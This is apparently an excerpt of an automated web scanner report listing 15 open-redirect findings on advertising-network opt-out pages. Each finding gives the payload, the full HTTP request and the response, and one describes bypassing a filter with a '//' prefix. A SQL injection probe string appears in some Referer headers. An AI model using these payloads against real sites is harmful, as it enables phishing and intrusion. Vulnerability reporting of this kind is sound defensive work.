<form name="login" id="amin" onsubmit="$h.FB.modal.loginForm.submit(); return false;">


<b>
...[SNIP]...
</div>
<input name="password" id="password" type="password" class="password" />

<div id="button" class="right">
...[SNIP]...
11. Open redirection  previous  next
There are 15 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Remediation background

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

11.1. http://a.tribalfusion.com/z/i.optout [success parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.optout

Issue detail

The value of the success request parameter is used to perform an HTTP redirect. The payload //a1bdb9eb3e283ca77/a%3fhttp%3a//www.networkadvertising.org/optout/opt_success.gif was submitted in the success parameter. This caused a redirection to the following URL:

The application attempts to prevent redirection attacks by blocking absolute redirection targets starting with http:// or https://. However, an attacker can defeat this defence by omitting the protocol prefix from their absolute URL. If a redirection target starting with // is specified, then the browser will use the same protocol as the page which issued the redirection.

Remediation detail

When attempting to block absolute redirection targets, the application should verify that the target begins with a single slash followed by a letter, and should reject any input containing a sequence of two slash characters.

Request

GET /z/i.optout?f=1&success=//a1bdb9eb3e283ca77/a%3fhttp%3a//www.networkadvertising.org/optout/opt_success.gif&failure=http://www.networkadvertising.org/optout/opt_failure.gif&tagKey=987828525&requestor=aLmtAZct6yKpcUcWnJrpGEJoCXSvBr1ToJoM6Mywpqjs9Ffvq2hr8nVpoIHNmZaC4PuexQUppSeEmBP3nDq5tPIpmcfFmHt29G HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ANON_ID=aXnX9qOZb3V7bEjUDvMidaWScbh5xabZbZailGc3CVs6E66XJ3bra2FuY2r9IoBuU1H2t33tkv7rNt17jRHB3318DQGPMR92kT7DnZbwUH6I0nn6WcH1j2CPGVUtZcclBVWRVYXdUo47ZbLM0728qZdZaWOdZbD0OoGTUddo7VHp3e3aArlEYjribDZbK9VeOEiAYybqSG3P3T6UCThFhZbmw0t54wIY0YVbFBub9VOeH4ZcVA4TgfKgvOJVx4vnl5n6wF8AZaWuZbjmiUZb0PqE2fpbMHLK8Sk

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 306
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 17:18:55 GMT;
Content-Type: text/html
Location: //a1bdb9eb3e283ca77/a%3fhttp%3a//www.networkadvertising.org/optout/opt_success.gif
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>
11.2. http://a1.interclick.com/CookieCheck.aspx [optOut parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /CookieCheck.aspx

Issue detail

The value of the optOut request parameter is used to perform an HTTP redirect. The payload http%3a//a903690df96c0d1ea/a%3fhttp%3a//www.networkadvertising.org/verify/cookie_optout.gif was submitted in the optOut parameter. This caused a redirection to the following URL:

Request

GET /CookieCheck.aspx?optOut=http%3a//a903690df96c0d1ea/a%3fhttp%3a//www.networkadvertising.org/verify/cookie_optout.gif&hasCookies=http%3a%2f%2fwww.networkadvertising.org%2fverify%2fcookie_exists.gif&nocookies=http%3a%2f%2fwww.networkadvertising.org%2fverify%2fno_cookie.gif&nocache=0.8156114 HTTP/1.1
Host: a1.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
Cookie: T=1; uid=u=b302c5d5-65f2-40f8-a929-cb62b8ddcae9; sgm=7435=734382&7980=734355&7596=734356&8629=734390&6376=734377&508=734383&11095=734384&11846=734385; Aqprep_Banner728X90=180321=634483501889336355:52092&15153=634483504593222074:52244&186958=634484097430248184:52092&178255=634484103596085110:52092&181817=634484107910194682:52092&179141=634484109212338592:52092; Aqprep_Banner300X250=185918=634484097445321310:52092&15152=634484109006430929:52244&154369=634484109251673078:52244&158279=634484109390165675:52244; Aqprep_Banner160X600=175227=634486856467000898:50775

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 202
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://a903690df96c0d1ea/a?http://www.networkadvertising.org/verify/cookie_optout.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 17 Sep 2011 17:11:03 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://a903690df96c0d1ea/a?http://www.networkadvertising.org/verify/cookie_optout.gif">here</a>.</h2>
</body></html>
...[SNIP]...
11.3. http://a1.interclick.com/optOut.aspx [fail parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://a1.interclick.com
Path:   /optOut.aspx

Issue detail

The value of the fail request parameter is used to perform an HTTP redirect. The payload http%3a//ad7114a2800ce115e/a%3fhttp%3a//www.networkadvertising.org/optout/opt_failure.gif was submitted in the fail parameter. This caused a redirection to the following URL:

Request

GET /optOut.aspx?optOut=verify&success=http%3a%2f%2fwww.networkadvertising.org%2foptout%2fopt_success.gif&fail=http%3a//ad7114a2800ce115e/a%3fhttp%3a//www.networkadvertising.org/optout/opt_failure.gif HTTP/1.1
Host: a1.interclick.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: Opt=out

Response

HTTP/1.1 302 Found
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 200
Content-Type: text/html; charset=utf-8
Expires: -1
Location: http://ad7114a2800ce115e/a?http://www.networkadvertising.org/optout/opt_failure.gif
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Sat, 17 Sep 2011 17:19:23 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://ad7114a2800ce115e/a?http://www.networkadvertising.org/optout/opt_failure.gif">here</a>.</h2>
</body></html>
11.4. http://login.dotomi.com/ucm/UCMController [redir_url parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://login.dotomi.com
Path:   /ucm/UCMController

Issue detail

The value of the redir_url request parameter is used to perform an HTTP redirect. The payload http%3a//adb1b14aa65246914/a%3fhttp%3a//usucmweb.dotomi.com/nai/nai_optout_redir.php was submitted in the redir_url parameter. This caused a redirection to the following URL:

Request

GET /ucm/UCMController?dtm_com=31&dtm_cid=2000&dtm_cmagic=7d619c&dtm_format=7&redir_url=http%3a//adb1b14aa65246914/a%3fhttp%3a//usucmweb.dotomi.com/nai/nai_optout_redir.php HTTP/1.1
Host: login.dotomi.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: DotomiUser=230600846273249123$0$2065492370; DotomiNet=2$DjQqblZ1R3FBBWdeBwJ9XghHIzxZewFTXBUgOFBKYHtrfgoKBQpCXAECVkBLQlUCJjFWfmp3CzQBfEMHZV4LB3JVCVV7cgViUgRNUGBDBwEgEGR8AAEICEBeBAJWR0hCQ1psa08oOycGGRA5AmtmXgQAdl0%3D

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:25:17 GMT
X-Name: dmc-s02
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache, private
P3P: "policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP""
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Thu, 15-Sep-2016 17:25:17 GMT; Path=/
Location: http://adb1b14aa65246914/a?http://usucmweb.dotomi.com/nai/nai_optout_redir.php

Content-Type: text/html
Content-Length: 0

11.5. http://nai.ad.us-ec.adtechus.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//a679410433c098970/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=4&rd=http%3a//a679410433c098970/a%3fhttp%3a//advertising.aol.com&nocache=2195200 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:14:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1203563412
Location: http://a679410433c098970/a?http://advertising.aol.com/token/4/3/1203563412/
Content-Length: 0
Content-Type: text/html

11.6. http://nai.adserver.adtechus.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//ac81f05a2e5c55470/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=5&rd=http%3a//ac81f05a2e5c55470/a%3fhttp%3a//advertising.aol.com&nocache=2195200 HTTP/1.1
Host: nai.adserver.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: criteoastro=1; JEB2=4E4934866E651A2318BD90FFF00050FA

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:14:41 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=843020230
Location: http://ac81f05a2e5c55470/a?http://advertising.aol.com/token/5/3/843020230/
Content-Length: 0
Content-Type: text/html

11.7. http://nai.adserverec.adtechus.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//afc538a7bf167a48a/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=6&rd=http%3a//afc538a7bf167a48a/a%3fhttp%3a//advertising.aol.com&nocache=2195200 HTTP/1.1
Host: nai.adserverec.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:14:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1796067773
Location: http://afc538a7bf167a48a/a?http://advertising.aol.com/token/6/3/1796067773/
Content-Length: 0
Content-Type: text/html

11.8. http://nai.adserverwc.adtechus.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//acbd7ee840c3c452/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=7&rd=http%3a//acbd7ee840c3c452/a%3fhttp%3a//advertising.aol.com&nocache=2195200 HTTP/1.1
Host: nai.adserverwc.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:15:38 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=115029846
Location: http://acbd7ee840c3c452/a?http://advertising.aol.com/token/7/3/115029846/
Content-Length: 0
Content-Type: text/html

11.9. http://nai.adsonar.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//acffaa1b8064c60a5/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=1&rd=http%3a//acffaa1b8064c60a5/a%3fhttp%3a//advertising.aol.com&nocache=2195200 HTTP/1.1
Host: nai.adsonar.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:14:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1662082667
Location: http://acffaa1b8064c60a5/a?http://advertising.aol.com/token/1/3/1662082667/
Content-Length: 0
Content-Type: text/html

11.10. http://nai.adtech.de/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//aa0cc007808144dc2/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=3&rd=http%3a//aa0cc007808144dc2/a%3fhttp%3a//advertising.aol.com&nocache=2195200 HTTP/1.1
Host: nai.adtech.de
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:15:37 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1641993715
Location: http://aa0cc007808144dc2/a?http://advertising.aol.com/token/3/3/1641993715/
Content-Length: 0
Content-Type: text/html

11.11. http://nai.advertising.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//a2e5eb67f36542514/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=0&rd=http%3a//a2e5eb67f36542514/a%3fhttp%3a//advertising.aol.com&nocache=2195200 HTTP/1.1
Host: nai.advertising.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: ACID=tX790013123977920032; C2=1yMdOB7+Fg5kG/tkCjQ3WXAci+yAeziRSkLuDYRxGhfkAPwuRX890utAT7qxly1IzacphaxAdPiRSEbPFsOlGGiq8MQgkZsET+NB5ydBIlLcEoCxGx7skXAfqaESj5nqGBYm0Wwq9XES; F1=BYpnb5kAAAAA8wEDAQAAgEABAAAABAAAAQAAgEA; BASE=DwATe36lhTYtJcJo1ABrqc7L93fLtd3+rPuylwx9kDBG7U44utasgCF5GADIBrmV9qzSc6vS1VFNbv27ZctOQdzvW1jCW1iqjpSBJWBy9PJ2LmBlN7oYv/UGD8fTZymi5p62qGFtxbh1N7D1juUqtDBKghlDCoK!; ROLL=fvAr20olF+7f08J!; GUID=MTMxNjI3NzQyOTsxOjE3Mmpta2gxN2cxMHJzOjM2NQ

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:14:10 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=420140824
Location: http://a2e5eb67f36542514/a?http://advertising.aol.com/token/0/3/420140824/
Content-Length: 0
Content-Type: text/html

11.12. http://nai.glb.adtechus.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//a2b9a138aa9608bd/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=8&rd=http%3a//a2b9a138aa9608bd/a%3fhttp%3a//advertising.aol.com&nocache=2195200 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:15:15 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=864402709
Location: http://a2b9a138aa9608bd/a?http://advertising.aol.com/token/8/3/864402709/
Content-Length: 0
Content-Type: text/html

11.13. http://nai.tacoda.at.atwola.com/nai/daa.php [rd parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of the rd request parameter is used to perform an HTTP redirect. The payload http%3a//a7f7db2ddb3eafdbc/a%3fhttp%3a//advertising.aol.com was submitted in the rd parameter. This caused a redirection to the following URL:

Request

GET /nai/daa.php?action_id=3&participant_id=2&rd=http%3a//a7f7db2ddb3eafdbc/a%3fhttp%3a//advertising.aol.com&nocache=2195200 HTTP/1.1
Host: nai.tacoda.at.atwola.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Cookie: ATTACID=a3Z0aWQ9MTcyam1raDE3ZzEwcnM=; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6; JEB2=4E45A26F6E651A2318BD90FFF001EBF9; ANRTT=; Tsid=0^1316277340^1316279228|15545^1316277340^1316279140|18182^1316277428^1316279228; eadx=x

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:14:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: OO_TOKEN=1084633382
Location: http://a7f7db2ddb3eafdbc/a?http://advertising.aol.com/token/2/3/1084633382/
Content-Length: 0
Content-Type: text/html

11.14. http://optout.crwdcntrl.net/optout [d parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://optout.crwdcntrl.net
Path:   /optout

Issue detail

The value of the d request parameter is used to perform an HTTP redirect. The payload http%3a//a2ea61c82b281e19e/a%3fhttp%3a//optout.crwdcntrl.net/optout/check.php%3fsrc%3dnaioo was submitted in the d parameter. This caused a redirection to the following URL:

Request

GET /optout?d=http%3a//a2ea61c82b281e19e/a%3fhttp%3a//optout.crwdcntrl.net/optout/check.php%3fsrc%3dnaioo&ct=Y HTTP/1.1
Host: optout.crwdcntrl.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: cc=optout

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 17 Sep 2011 17:19:45 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Location: http://a2ea61c82b281e19e/a?http://optout.crwdcntrl.net/optout/check.php?src=naioo
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

11.15. http://privacy.revsci.net/optout/optoutv.aspx [p parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://privacy.revsci.net
Path:   /optout/optoutv.aspx

Issue detail

The value of the p request parameter is used to perform an HTTP redirect. The payload http%3a//a7eb4270056fd51b9/a%3fhttp%3a//www.networkadvertising.org was submitted in the p parameter. This caused a redirection to the following URL:

Request

GET /optout/optoutv.aspx?v=2&p=http%3a//a7eb4270056fd51b9/a%3fhttp%3a//www.networkadvertising.org&nocache=0.9437873 HTTP/1.1
Host: privacy.revsci.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp?130670060%27%20or%201%3d1--%20=1
